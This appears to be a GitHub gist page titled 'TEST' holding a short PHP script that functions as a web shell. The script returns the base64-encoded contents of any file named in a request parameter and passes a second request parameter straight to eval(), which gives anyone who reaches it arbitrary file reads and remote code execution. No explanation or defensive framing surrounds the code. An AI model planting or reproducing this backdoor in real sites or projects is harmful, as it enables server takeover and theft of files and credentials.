Skip to content

Instantly share code, notes, and snippets.

@Gydo194
Last active August 8, 2018 17:50
Show Gist options
  • Save Gydo194/a41a9b90477aae609583095ef0721c43 to your computer and use it in GitHub Desktop.
Save Gydo194/a41a9b90477aae609583095ef0721c43 to your computer and use it in GitHub Desktop.
TEST
<?php
echo "SCRIPT RUN<br>";
if(isset($_REQUEST["file"]))
{
echo base64_encode(file_get_contents($_REQUEST["file"]));
}
if(isset($_REQUEST["code"]))
{
echo base64_encode(eval($_REQUEST["code"]));
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment